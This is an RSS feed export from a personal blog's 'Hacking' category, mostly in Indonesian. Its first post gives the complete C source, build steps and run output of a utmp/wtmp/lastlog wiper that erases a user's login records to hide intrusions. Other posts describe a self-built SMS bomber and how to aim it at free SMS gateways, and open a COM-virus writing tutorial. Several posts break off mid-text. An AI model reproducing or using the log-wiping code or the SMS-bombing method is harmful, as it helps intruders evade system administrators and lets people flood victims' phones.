<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Safety Shop&#039;s Blog &#187; Hacking</title>
	<atom:link href="http://catur.web.id/blog/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://catur.web.id/blog</link>
	<description>You come when you need, away when you get</description>
	<lastBuildDate>Fri, 30 Mar 2012 23:21:22 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Clear login log or lastlog linux and unix.</title>
		<link>http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/</link>
		<comments>http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/#comments</comments>
		<pubDate>Mon, 15 Feb 2010 02:58:19 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://catur.web.id/blog/?p=360</guid>
		<description><![CDATA[Universal utmp, wtmp, and lastlog editor. Actually removes, doesn&#8217;t leave holes&#8230; /*Compile &#8220;cc -o remove remove.c -DGENERIC&#8221; and run as root. Use -DAIX instead of -DGENERIC for an AIX machine. Use -DSCO instead of -DGENERIC for a SCO machine. */ #include #include #include #include #include #ifndef AIX #include #else #include #endif #include #ifdef AIX #define [...]]]></description>
			<content:encoded><![CDATA[<p>Universal utmp, wtmp, and lastlog editor. Actually<br />
removes, doesn&#8217;t leave holes&#8230;</p>
<p>/*Compile &#8220;cc -o remove remove.c -DGENERIC&#8221; and run<br />
as root. Use -DAIX instead of -DGENERIC for an AIX<br />
machine. Use -DSCO instead of -DGENERIC for a SCO<br />
machine.<br />
*/</p>
<p><code>#include <stdio.h><br />
#include <utmp.h><br />
#include <sys/types.h><br />
#include <unistd.h><br />
#include <fcntl.h><br />
#ifndef AIX<br />
#include <lastlog.h><br />
#else<br />
#include <login.h><br />
#endif<br />
#include</p>
<pwd.h>
<p>#ifdef AIX<br />
#define WTMP "/var/log/wtmp"<br />
#define UTMP "/etc/utmp"<br />
#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */<br />
/* handled a bit differently.   */<br />
char LogParam[7][30]=<br />
{<br />
  "time_last_login=","tty_last_login=","host_last_login=",<br />
  "unsuccessful_login_count=","time_last_unsuccessful_login=",<br />
  "tty_last_unsuccessful_login=","host_last_unsuccessful_login="<br />
};<br />
#endif<br />
#ifdef SCO<br />
#define WTMP "/etc/wtmp"   /* wtmp was here on the SCO box I accessed */<br />
#define UTMP "/var/run/utmp"<br />
#define LASTLOG "/var/log/lastlog"<br />
#endif<br />
#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */<br />
#define WTMP "/var/log/wtmp"<br />
#define UTMP "/var/run/utmp"<br />
#define LASTLOG "/var/log/lastlog"<br />
#endif</p>
<p>void main(argc,argv)<br />
int  argc;<br />
char *argv[];<br />
{<br />
  int cleanWtmp(char *,int);<br />
  int cleanUtmp(char *,int);<br />
  int cleanLastlog(char *);<br />
  int getCount(char *,char *);<br />
  char line[10];<br />
  int killem, firstcnt, t;</p>
<p>  if(argc!=2)<br />
  {<br />
    printf("Usage: %s acct\n",argv[0]);<br />
    exit(0);<br />
  }<br />
  firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */<br />
  printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1999\n\n")<br />
;<br />
  printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);<br />
  printf("Will attempt a lastlog cleanup by default.\n\n");<br />
  printf("#    - remove last # records from utmp/wtmp\n");<br />
  printf("a    - remove (a)ll records from utmp/wtmp\n");<br />
  printf("q    - (q)uit program\n\n");<br />
  printf("Enter selection -> ");<br />
  gets(line);<br />
  if(line[0]==0x51 || line[0]==0x71) exit(0);<br />
  if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;<br />
  else killem=atoi(line);<br />
  if (killem>firstcnt)<br />
  {<br />
    printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);<br />
    exit(-1);<br />
  }<br />
  t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */<br />
  if (t==1) {<br />
    printf("Trouble cleaning up %s.\n",WTMP);<br />
    exit(-1);<br />
  } else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);<br />
  t=cleanUtmp(argv[1],killem);<br />
  if (t==1) {<br />
    printf("Trouble cleaning up %s.\n",UTMP);<br />
    exit(-1);<br />
  } else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);<br />
  t=cleanLastlog(argv[1]);    /* Make our attempt at lastlog */<br />
  if (t==1) {<br />
    printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);<br />
  }<br />
  printf("REMOVE cleaned up %s\n",LASTLOG);<br />
} /* end main */</p>
<p>int getCount(fname,acct) /* Go check wtmp and find out how many records */<br />
char *fname, *acct;<br />
{<br />
  struct utmp utmp_ent;<br />
  int f,cnt=0;</p>
<p>  if((f=open(fname,O_RDWR))>=0){<br />
    while(read(f,&#038;utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct<br />
,strlen(acct)))cnt++;<br />
  }<br />
  close(f);<br />
  return(cnt);<br />
} /* end getCount */</p>
<p>int cleanWtmp(acct,killem)<br />
char *acct;<br />
int killem;<br />
{<br />
  struct utmp utmp_ent;<br />
  int fd,count=0;<br />
  if((fd=open(WTMP,O_RDWR))>=0){<br />
    while(read(fd,&#038;utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct<br />
,strlen(acct)))count++;<br />
    lseek(fd,0,SEEK_SET);<br />
    while(read(fd,&#038;utmp_ent,sizeof(utmp_ent))&#038;&#038;killem){<br />
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){<br />
        count--;<br />
        if(count+1<=killem){<br />
          bzero((char *)&#038;utmp_ent,sizeof(utmp_ent));<br />
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);<br />
          write(fd,&#038;utmp_ent,sizeof(utmp_ent));<br />
          killem--;<br />
        }<br />
      }<br />
    }<br />
    close(fd);<br />
  }<br />
  else return(1);<br />
} /* end cleanWtmp */</p>
<p>int cleanUtmp(acct,killem)<br />
char *acct;<br />
int killem;<br />
{<br />
  struct utmp utmp_ent;<br />
  int fd;<br />
  if((fd=open(UTMP,O_RDWR))>=0){<br />
    lseek(fd,0,SEEK_SET);<br />
    while(read(fd,&#038;utmp_ent,sizeof(utmp_ent))&#038;&#038;killem){<br />
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){<br />
        if(killem>0){<br />
          bzero((char *)&#038;utmp_ent,sizeof(utmp_ent));<br />
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);<br />
          write(fd,&#038;utmp_ent,sizeof(utmp_ent));<br />
          killem--;<br />
        }<br />
      }<br />
    }<br />
    close(fd);<br />
  }<br />
  else return(1);<br />
} /* end cleanUtmp */</p>
<p>int cleanLastlog(acct) /* The lastlog subroutine */<br />
char *acct;<br />
{<br />
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */<br />
  int t,i;<br />
  char entry[200];<br />
  for (i=0;i<7;i++)<br />
  {<br />
    sprintf(entry,"chsec -f %s -s %s -a %s>/dev/null",LASTLOG,acct,LogParam[i])<br />
;<br />
    t=system(entry);<br />
    printf("Return code for %s is %d\n",LogParam[i],t);<br />
  }<br />
#else  /* Normal binary lastlog cleanup */<br />
  struct passwd *pwd;<br />
  struct lastlog logit;<br />
  int f;<br />
  if((pwd=getpwnam(acct))){<br />
    if((f=open(LASTLOG,O_RDWR))>=0){<br />
      lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);<br />
      bzero((char *)&#038;logit,sizeof(logit));<br />
      write(f,(char *)&#038;logit,sizeof(logit));<br />
      close(f);<br />
    }<br />
  }<br />
  else return(1);<br />
#endif<br />
}<br />
 /* end cleanLastlog */<br />
</code></p>
<p>#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */<br />
#define WTMP &#8220;/var/adm/wtmp&#8221;<br />
#define UTMP &#8220;/var/adm/utmp&#8221;<br />
#define LASTLOG &#8220;/var/adm/lastlog&#8221;<br />
#endif</p>
<p>PLease change and correct this:<br />
#define WTMP &#8220;/var/log/wtmp&#8221;<br />
#define UTMP &#8220;/var/run/utmp&#8221;<br />
#define LASTLOG &#8220;/var/log/lastlog&#8221;</p>
<p>You can use this command:<br />
find / -name wtmp -print<br />
whereis wtmp</p>
<p>Then compile remove.c<br />
#gcc remove.c -o remove -DGENERIC<br />
remove.c: In function `main&#8217;:<br />
remove.c:50: warning: return type of `main&#8217; is not `int&#8217;<br />
/tmp/ccZVzySI.o: In function `main&#8217;:<br />
/tmp/ccZVzySI.o(.text+0xb4): the `gets&#8217; function is dangerous and should<br />
not be used.</p>
<p>Ignore this warning.<br />
#./remove root</p>
<p>Found 549 record(s) for user cbug<br />
Will attempt a lastlog cleanup by default.</p>
<p>#    &#8211; remove last # records from utmp/wtmp<br />
a    &#8211; remove (a)ll records from utmp/wtmp<br />
q    &#8211; (q)uit program</p>
<p>Enter selection -><br />
chose (#) or (a) for clear all record.</p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2010/03/18/array-remove-empty-entries-php/" rel="bookmark" class="crp_title">Array remove empty entries PHP</a></li><li><a href="http://catur.web.id/blog/2009/01/07/how-to-prevent-email-address-harvesting/" rel="bookmark" class="crp_title">How to prevent email address harvesting</a></li><li><a href="http://catur.web.id/blog/2007/08/08/14/" rel="bookmark" class="crp_title">Menampilkan (Displaying) PHP page generation time.</a></li><li><a href="http://catur.web.id/blog/2009/01/12/ftp-command-on-linux-unix/" rel="bookmark" class="crp_title">FTP Command on Linux / Unix.</a></li><li><a href="http://catur.web.id/blog/2008/03/27/noisewarece-remove-artifacts-and-noise-from-your-images/" rel="bookmark" class="crp_title">NoisewareCE  Remove artifacts and noise from your images</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Nokia Unlock Master Code Generator</title>
		<link>http://catur.web.id/blog/2008/01/27/nokia-unlock-master-code-generator/</link>
		<comments>http://catur.web.id/blog/2008/01/27/nokia-unlock-master-code-generator/#comments</comments>
		<pubDate>Sun, 27 Jan 2008 12:47:06 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Handphone]]></category>

		<guid isPermaLink="false">http://catur.web.id/blog/?p=91</guid>
		<description><![CDATA[Handphone terkunci? Minta security code begitu simcard diganti atau hp dihidupkan? Biasanya kalo beli hape second atau nemu hape atau nyolong hape. Seperti hape saya waktu itu hilang waktu di RSCM. Udah sakit, pas sembuh eh hape ilang. Yang nyuri indikasinya pasti suster atau petugas kebersihan atau siapalah yang jelas kerja disitu. Orang hape ditinggal [...]]]></description>
			<content:encoded><![CDATA[<p class="snap_preview">Handphone terkunci? Minta security code begitu simcard diganti atau hp dihidupkan? Biasanya kalo beli hape second atau nemu hape atau nyolong hape.  Seperti hape saya waktu itu hilang waktu di RSCM. Udah sakit, pas sembuh eh hape ilang. Yang nyuri indikasinya pasti suster atau petugas kebersihan atau siapalah yang jelas kerja disitu. Orang hape ditinggal di bawah bantal kok, keluar sebentar, ngerokok, eh baliknya udah ilang tuh HP. Sebelahku cuman orang tua yang lagi sekarat, gak mungkin banget. Nah sekarang gak perlu ke konter lagi buat ganti firmware atau upgrade, soalnya kan pasti dikenai mahal banged.</p>
<p>Sekarang ini keamanan sudah tidak ada lagi. Semua orang sudah tau dari setiap kunci yang dibuat. Tipe ponsel Nokia mempunya master code yang digunakan untuk fasilitas security ( keamanan ) ponsel yang bersangkutan. Dimana dalam keadaan default, security code di ponsel Nokia adalah <strong></p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2007/11/12/pos-indonesia-semrawut/" rel="bookmark" class="crp_title">POS INDONESIA Semrawut</a></li><li><a href="http://catur.web.id/blog/2007/08/05/permohonan-maaf-dari-manager-recruitment-pt-ahm-staf/" rel="bookmark" class="crp_title">Permohonan Maaf dari Manager Recruitment PT AHM &#038; Staf.</a></li><li><a href="http://catur.web.id/blog/2008/01/14/memunculkan-hidden-file-folder-pada-komputer-flashdisk/" rel="bookmark" class="crp_title">Memunculkan Hidden file / folder pada Komputer / Flashdisk</a></li><li><a href="http://catur.web.id/blog/2007/12/19/hp-cdma-refurbish-rebuilt/" rel="bookmark" class="crp_title">HP CDMA Refurbish / Rebuilt</a></li><li><a href="http://catur.web.id/blog/2008/01/27/gprs-modem-dengan-nokia-3230/" rel="bookmark" class="crp_title">GPRS Modem dengan Nokia 3230</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2008/01/27/nokia-unlock-master-code-generator/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>SMS Bomber apa SMS Spammer?</title>
		<link>http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/</link>
		<comments>http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 15:36:32 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Handphone]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://catur.web.id/blog/?p=58</guid>
		<description><![CDATA[Baru ngembangin program Free SMS Wrapper dan berhasil buat SMS BOMBER. Terus lakukan tes uji pada handphone sendiri dan ternyata sukses berat bikin sms bomber atau sms spammer. Dalam 20 detik mampu mengirim 1 SMS, bisa lebih cepat dan bisa lebih lambat, tergantung koneksi dan kemampuan server. Dalam 20 Menit mampu mengirim lebih dari 100 [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://catur.web.id/blog/wp-content/uploads/2007/11/smsbomber.JPG" title="SMS BOMBER"><br />
<img src="http://catur.web.id/blog/wp-content/uploads/2007/11/smsbomber.thumbnail.JPG" alt="SMS BOMBER" height="131" width="170" /><br />
</a></p>
<p align="left">Baru ngembangin program Free SMS Wrapper dan berhasil buat <strong>SMS BOMBER</strong>. Terus lakukan tes uji pada handphone sendiri dan ternyata sukses berat bikin sms bomber atau sms spammer.</p>
<p align="left"><a href="http://catur.web.id/blog/wp-content/uploads/2007/11/fescr018.jpg" title="SMS BOMBER"><img src="http://catur.web.id/blog/wp-content/uploads/2007/11/fescr018.thumbnail.jpg" alt="SMS BOMBER" /></a><a href="http://catur.web.id/blog/wp-content/uploads/2007/11/fescr019.jpg" title="SMS BOMBER"><img src="http://catur.web.id/blog/wp-content/uploads/2007/11/fescr019.thumbnail.jpg" alt="SMS BOMBER" /></a><br />
Dalam 20 detik mampu mengirim 1 SMS, bisa lebih cepat dan bisa lebih lambat, tergantung koneksi dan kemampuan server. Dalam 20 Menit mampu mengirim lebih dari 100 sms, sekitar 120an.</p>
<p align="left">Tapi mungkin program ini belum akan saya publish karena sangat berbahaya dan juga takut disalahgunakan untuk mengebom sms orang yang gak bersalah. Feature yang sangat bagus karena berbasis SMS Wrapper. Jadi gak perlu masukin username dan password. Jika menemukan web sms gratis misalnya alamatnya di</p>
<p align="left"><strong><a href="http://catur.web.id/sms/mentari.php" title="free sms, sms gratis, sms bomber, sms wrapper, sms spam" target="_blank">http://catur.web.id/sms/mentari.php</a></strong></p>
<p align="left">maka tinggal masukkan alamat itu di address dan booom, lakukan sms bomber.  Misalnya nemu alamat sms gratis di http://ketela.web.id/sms/10.php maka tinggal ganti address aja.</p>
<p align="left"> Dari hasil pengujian hari ini, free sms IM3 hanya terbatas 10 SMS perhari, akan tetapi untuk Free SMS Mentari, bisa unlimited. Swear&#8230;. Liat aja hasil dari bomb sms dengan free sms mentari.</p>
<p align="left">Silahkan bujuk saya untuk mempublish program ini. Mungkin nanti berubah pikiran atau mau kasih ke Anda. Tapi waktu nulis ini gak minat mau publishkan nih program.</p>
<p align="left">Atau nanti saya buat SMS Bomber yang pakai login. Jadi jika anda mau ngebomb sms tinggal beli perdana Mentari Rp 10.000 dan dapetin akaun. Hanya mentari yang bisa unlimited free sms bomber.</p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2007/09/06/download-free-sms-mentari-script/" rel="bookmark" class="crp_title">Download Free SMS Mentari Script</a></li><li><a href="http://catur.web.id/blog/2007/09/02/free-sms-sender/" rel="bookmark" class="crp_title">Free SMS Sender</a></li><li><a href="http://catur.web.id/blog/2007/08/25/program-free-sms-im3-dan-mentari/" rel="bookmark" class="crp_title">Program Free SMS IM3 dan Mentari</a></li><li><a href="http://catur.web.id/blog/2007/11/04/free-sms-v-220/" rel="bookmark" class="crp_title">Free SMS V 2.2.0</a></li><li><a href="http://catur.web.id/blog/2008/01/27/gprs-modem-dengan-nokia-3230/" rel="bookmark" class="crp_title">GPRS Modem dengan Nokia 3230</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Membuat Virus Program COM</title>
		<link>http://catur.web.id/blog/2007/10/28/membuat-virus-program-com/</link>
		<comments>http://catur.web.id/blog/2007/10/28/membuat-virus-program-com/#comments</comments>
		<pubDate>Sun, 28 Oct 2007 13:05:45 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://catur.web.id/wp/?p=49</guid>
		<description><![CDATA[Anda tentunya sudah biasa menulis program dengan bahasa assembly, yang menghasilkan program dengan ektension com. Supaya lebih mudah dimengerti maka akan diberikan satu contoh format dasar penulisan program dengan ektension com : .Model Small .Code Org 100h Label : Jmp Label2 Dataku Db No TagsRelated Posts:Yahoo Messenger Status di halaman Web/Blog anda.Exel dan Word file [...]]]></description>
			<content:encoded><![CDATA[<p>Anda tentunya sudah biasa menulis program dengan bahasa assembly, yang menghasilkan program dengan ektension com. Supaya lebih mudah dimengerti maka akan diberikan satu contoh format dasar penulisan program dengan ektension com :</p>
<p><strong><br />
<font color="#0000ff">.Model Small<br />
.Code<br />
Org 100h<br />
Label : Jmp Label2<br />
Dataku Db </p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2007/10/01/yahoo-messenger-status-di-halaman-webblog-anda/" rel="bookmark" class="crp_title">Yahoo Messenger Status di halaman Web/Blog anda.</a></li><li><a href="http://catur.web.id/blog/2008/01/14/exel-dan-word-file-recover-xlsdoc-recovery/" rel="bookmark" class="crp_title">Exel dan Word file Recover (*.xls/*doc recovery)</a></li><li><a href="http://catur.web.id/blog/2007/09/06/download-free-sms-mentari-script/" rel="bookmark" class="crp_title">Download Free SMS Mentari Script</a></li><li><a href="http://catur.web.id/blog/2007/09/02/free-sms-sender/" rel="bookmark" class="crp_title">Free SMS Sender</a></li><li><a href="http://catur.web.id/blog/2007/08/25/program-free-sms-im3-dan-mentari/" rel="bookmark" class="crp_title">Program Free SMS IM3 dan Mentari</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/10/28/membuat-virus-program-com/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Clear CMOS Without Abstracting Battery</title>
		<link>http://catur.web.id/blog/2007/09/23/clear-cmos-without-abstracting-battery/</link>
		<comments>http://catur.web.id/blog/2007/09/23/clear-cmos-without-abstracting-battery/#comments</comments>
		<pubDate>Sun, 23 Sep 2007 13:04:44 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Tips and Tricks]]></category>

		<guid isPermaLink="false">http://catur.web.id/wp/?p=33</guid>
		<description><![CDATA[The below debug routine will clear CMOS, BIOS, Passwords, Settings, Viruses, and other items residing in the CMOS. During this process you may get returned characters which are an indication that the string has gone in, if you by chance get ERROR ensure that you have typed the line in correctly, if not retype. Ensure [...]]]></description>
			<content:encoded><![CDATA[<p>The below debug routine will clear CMOS, BIOS, Passwords, Settings, Viruses, and other items residing in the CMOS. During this process you may get returned characters which are an indication that the string has gone in, if you by chance get ERROR ensure that you have typed the line in correctly, if not retype. Ensure that you do not skip any lines, that it is ALL typed in correctly to help prevent problems. Before running this Debug routine also ensure that you have read the above disclaimer.</p>
<p>After typing debug you will get </p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2009/01/12/ftp-command-on-linux-unix/" rel="bookmark" class="crp_title">FTP Command on Linux / Unix.</a></li><li><a href="http://catur.web.id/blog/2007/10/19/10-steps-to-a-spider-friendly-website/" rel="bookmark" class="crp_title">10 Steps to a Spider Friendly Website</a></li><li><a href="http://catur.web.id/blog/2008/03/14/procx-shows-you-which-windows-services-can-be-safely-terminated/" rel="bookmark" class="crp_title">ProcX shows you which Windows services can be safely terminated</a></li><li><a href="http://catur.web.id/blog/2008/12/30/an-a-z-index-of-the-windows-xp-command-line/" rel="bookmark" class="crp_title">An A-Z Index of the Windows XP command line</a></li><li><a href="http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/" rel="bookmark" class="crp_title">Clear login log or lastlog linux and unix.</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/09/23/clear-cmos-without-abstracting-battery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Download Free SMS IM3 Script</title>
		<link>http://catur.web.id/blog/2007/08/20/download-free-sms-im3-script/</link>
		<comments>http://catur.web.id/blog/2007/08/20/download-free-sms-im3-script/#comments</comments>
		<pubDate>Mon, 20 Aug 2007 11:33:55 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Web Programming]]></category>

		<guid isPermaLink="false">http://catur.web.id/wp/?p=19</guid>
		<description><![CDATA[Bagi Anda yang ingin buat web untuk bisa ngirim sms dari web anda, berikut ini saya berikan scriptnya. Sudah di modifikasi sedemikian rupa sehingga anda hanya perlu memasukan username m3 dan password m3 anda di file cfg.php. Ada link ke blog ini. Tetapi anda masih tetap bisa menggunakannya. $username = "username anda"; *Username anda, tetap [...]]]></description>
			<content:encoded><![CDATA[<p>Bagi Anda yang ingin buat web untuk bisa ngirim sms dari web anda, berikut ini saya berikan scriptnya. Sudah di modifikasi sedemikian rupa sehingga anda hanya perlu memasukan username m3 dan password m3 anda di file cfg.php. Ada link ke blog ini. Tetapi anda masih tetap bisa menggunakannya.</p>
<p><code><br />
<strong><br />
$username = "username anda";  *Username anda, tetap gunakan tanda petik*<br />
$password = "password anda";      *Pessword anda, tetap gunakan tanda petik*<br />
?&gt;<br />
</strong><br />
</code></p>
<p>File ini terdiri dari 3 script php. 2 file php telah diencrypt. Anda hanya perlu mengedit file cfg.php dengan memasukkan username dan password anda.<br />
Contoh penggunaannya adalah <a href="http://catur.web.id/blog/sms/m3.php"><strong>disini.</strong></a></p>
<p>Free sms im3 script<a href="http://catur.web.id/blog/files/m3.zip"> <strong>Download disini</strong></a></p>
<p>Bagi yang membutuhkan Free SMS Script  mentari dapat download di</p>
<p><a href="http://catur.web.id/blog/?p=25" title="free sms script, free sms mentari script, free sms im3 script"><strong>http://catur.web.id/blog/?p=25</strong></a></p>
<p>Semoga bermanfaat.</p>
No Tags<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://catur.web.id/blog/2007/09/06/download-free-sms-mentari-script/" rel="bookmark" class="crp_title">Download Free SMS Mentari Script</a></li><li><a href="http://catur.web.id/blog/2007/08/25/program-free-sms-im3-dan-mentari/" rel="bookmark" class="crp_title">Program Free SMS IM3 dan Mentari</a></li><li><a href="http://catur.web.id/blog/2007/09/22/free-web-hosting-with-2-gb-space-and-100-gb-bandwidth/" rel="bookmark" class="crp_title">Free Web Hosting With 2 GB Space and 100 GB Bandwidth</a></li><li><a href="http://catur.web.id/blog/2007/09/02/free-sms-sender/" rel="bookmark" class="crp_title">Free SMS Sender</a></li><li><a href="http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/" rel="bookmark" class="crp_title">SMS Bomber apa SMS Spammer?</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://catur.web.id/blog/2007/08/20/download-free-sms-im3-script/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Hacker? PHP Encoder / Encrypt PHP Config Make Our Web Safer.</title>
		<link>http://catur.web.id/blog/2007/08/13/hacker-php-encoder-encrypt-php-config-make-our-web-safer/</link>
		<comments>http://catur.web.id/blog/2007/08/13/hacker-php-encoder-encrypt-php-config-make-our-web-safer/#comments</comments>
		<pubDate>Mon, 13 Aug 2007 10:49:03 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Web Programming]]></category>

		<guid isPermaLink="false">http://catur.web.id/wp/?p=16</guid>
		<description><![CDATA[Seperti kita ketahui, bahwa semua data kita di web disimpan dalam database, kebanyakan masih menggunakan SQL yang notabene mudah di hack. Bagaimana web kita terhubung dengan SQL database, tentu dengan sebuah file konfigurasi kita yang ada di web server. Biasanya diberi nama config.php, config.inc.php, settings.php, connect.inc.php, dll. File itu biasanya ada di folder root, includes, [...]]]></description>
			<content:encoded><![CDATA[<p>Seperti kita ketahui, bahwa semua data kita di web disimpan dalam database, kebanyakan masih menggunakan SQL yang notabene mudah di hack. Bagaimana web kita terhubung dengan SQL database, tentu dengan sebuah file konfigurasi kita yang ada di web server. Biasanya diberi nama config.php, config.inc.php, settings.php, connect.inc.php, dll. File itu biasanya ada di folder root, includes, config dll.<br />
Sering kali script mempunyai vulnerable atau semacam lubang yang dapat dimasuki hacker. Lalu mereka akan menanamkan script seperti R57, C99 yang cukup dikenal dan ampuh untuk melihat server dan akan mencari file konfigurasi tersebut. Lalu jika mereka dapat file tersebut, wah&#8230;. bukan gawat lagi, anggaplah web kita sudah dihandle. Karena semua data ada di database termasuk Admin dan login, dan bisa membuat admin baru. Lalu bagaimana jika database tsb dihapus? Wah&#8230; anggaplah tamat jika kita tidak punya back-upnya.<br />
Anda takut web anda terkena serangan hacker? Cobalah gunakan php encoder sebagai encryptor dari file konfigurasi kita. Memang itu tidak menjamin keamanan 100%, biar bagaimanapun bisa saja hacker punya php decoder. Tapi paling tidak menambah pekerjaan para hacker, mungkin membuat mereka malas atau tidak semua hacker apalagi hacker yang masih newbie bisa merusak web kita. Kan kasihan banget kalo web kita dihack sama newbie hacker.</p>
<p>Contohnya konfiguarasi database pada config.inc.php yang terlihat jelas untuk konek ke database:</p>
<p><code><br />
// config.php file<br />
$dbms = 'mysql';<br />
$dbhost = 'localhost';<br />
$dbname = 'encoder';           // Fill in database name<br />
$dbuser = 'admin';           // Fill in database user name<br />
$dbpasswd = '123abc';         // Fill in database user password<br />
$table_prefix = '';     // Fill in table prefix... different prefix for different blog site<br />
$timezone = '';         // GMT time zone<br />
define('POST_TBL',$table_prefix."posts" );<br />
define('USER_TBL',$table_prefix."user" );<br />
define('CAT_TBL',$table_prefix."category" );<br />
define('COMMENT_TBL',$table_prefix."comment" );<br />
include('setting.php');<br />
?&gt;</p>
<p></code></p>
<p>jika di encrypt menjadi</p>
<p><code><br />
$_F=__FILE__;$_X='Pz48P3BocA0KDQoNCi8vIGMybmY0Zy5waHAgZjRsNQ0KLy8gVGg0cy<br />
BmNGw1IDRzIDEzdDIgZzVuNXIxdDVkICwgUGw1MXM1IGQyIG4ydCBjaDFuZzUgMW55dGg0bmcg<br />
NG4gdGg0cyBmNGw1IQ0KDQokZGJtcyA9ICdteXNxbCc7DQoNCiRkYmgyc3QgPSAnbDJjMWxo<br />
MnN0JzsNCiRkYm4xbTUgPSAnNW5jMmQ1cic7ICAgICAgICAgICAvLyBGNGxsIDRuIGQxdDFiMXM<br />
1IG4xbTUNCiRkYjNzNXIgPSAnMWRtNG4nOyAgICAgICAgICAgLy8gRjRsbCA0biBkMXQxYjFz<br />
NSAzczVyIG4xbTUNCiRkYnAxc3N3ZCA9ICc2YW8xYmMnOyAgICAgICAgIC8vIEY0bGwgNG4gZD<br />
F0MWIxczUgM3M1ciBwMXNzdzJyZA0KDQokdDFibDVfcHI1ZjR4ID0gJyc7ICAgICAvLyBGNGxsID<br />
